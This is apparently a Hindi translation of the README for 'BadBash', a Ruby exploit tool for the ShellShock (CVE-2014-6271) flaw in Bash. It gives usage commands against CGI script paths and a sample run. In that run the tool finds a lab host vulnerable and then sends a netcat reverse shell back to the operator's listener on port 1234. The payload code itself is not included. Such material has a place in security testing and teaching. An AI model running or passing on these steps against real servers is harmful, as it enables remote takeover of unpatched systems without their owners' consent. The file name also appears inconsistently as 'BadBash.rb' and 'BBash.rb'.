
CVE-2014-6271 (ShellShock) RCE PoC उपकरण
CVE-2014-6271 (ShellShock) RCE PoC उपकरण
======= BadBash एक CVE-2014-6271 RCE शोषण उपकरण है। मूल संस्करण केवल HTTP CGI साइट की जाँच करता है और केवल पोर्ट 1234 पर netcat रिवर्स शेल प्रदान करता है।
डेवलपर : एंडी यांग संस्करण : 0.1.0 लाइसेंस : GPLv3
मूल GitHub परियोजना : https://github.com/RainMak3r/Rainstorm
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - CVE-2014-6271 RCE उपकरण एंडी यांग द्वारा मूल संस्करण केवल HTTP साइट की जाँच करता है मूल संस्करण केवल पोर्ट 1234 पर netcat रिवर्स शेल प्रदान करता है
उदाहरण उपयोग:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI पथ CGI पृष्ठ का पूर्ण पथ
-d, --Destination IP आपका IP पता जो आने वाले कनेक्शन को सुनता है
-h, --help सहायता दिखाएँ
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] जाँच कर रहा है कि लक्ष्य असुरक्षित है या नहीं........
[Info] इसमें 10 सेकंड तक लग सकते हैं........
[Info] लक्ष्य असुरक्षित है!!!
[Info] कृपया रिवर्स शेल के लिए पोर्ट 1234 पर सुनने के लिए NC का उपयोग करें..........
[Info] रिवर्स शेल के लिए शोषण कर रहा है ताकि 172.16.189.1:1234 को netcat के माध्यम से कनेक्ट किया जा सके..........